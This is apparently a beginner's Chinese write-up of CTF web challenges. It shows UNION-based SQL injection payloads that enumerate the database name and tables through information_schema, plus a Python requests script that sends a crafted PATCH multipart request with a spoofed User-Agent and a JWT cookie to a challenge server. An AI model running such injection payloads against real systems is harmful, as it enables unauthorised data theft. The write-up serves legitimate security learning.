谢谢皮蛋
做这题之前需要先去学习一些数据库的知识
- 1 order by 2
1可以理解为输入的id,是一个占位符,按第二列排序用来测试列数,如果没有两列则会报错 - -1 union select 1,2
-1同样是占位符,union的作用是将注入语句合并到原始语句中,select 1,2用于从数据库中返回两个常量值1,2
- -1 union select 1,database()
拿到数据库名,接下来查看表名
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
全都看一遍,拿到flag
PangBai 过家家(1)
根据提示,在网络里找到下一关的地址
输入查询参数,进入下一关
第三关采用post方法发送请求,先下一个hackbar插件
这里是真不懂有什么逻辑在其中了,第四关wp说将刚才发的请求再重新发一遍,为什么要这么做呢
根据提示将用户代理改为Papa/1.0,进入下一关
同样,我们再发一次请求,得到
import requests
# URL 和 Headers
url = "http://8.147.132.32:36002/?ask=miao"
headers = {
"Host": "8.147.132.32:36002",
"User-Agent": "Papa/1.0",
"Content-Type": "multipart/form-data; boundary=abc",
"Cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsZXZlbCI6NX0.xKi0JkzaQ0wwYyC3ebBpjuypRYvrYFICU5LSRLnWq_0",
}
# 构造 form-data 数据
data = (
"--abc\r\n"
'Content-Disposition: form-data; name="file"; filename="1.zip"\r\n'
"\r\n"
"123\r\n"
"--abc\r\n"
'Content-Disposition: form-data; name="say"\r\n'
"\r\n"
"玛卡巴卡阿卡哇卡米卡玛卡呣\r\n"
"--abc--\r\n"
)
# 发送 PATCH 请求
response = requests.patch(url, headers=headers, data=data)
# 打印响应
print("Status Code:", response.status_code)
print("Response Text:", response.text)
hackbar莫名出了点问题,后面就没做了
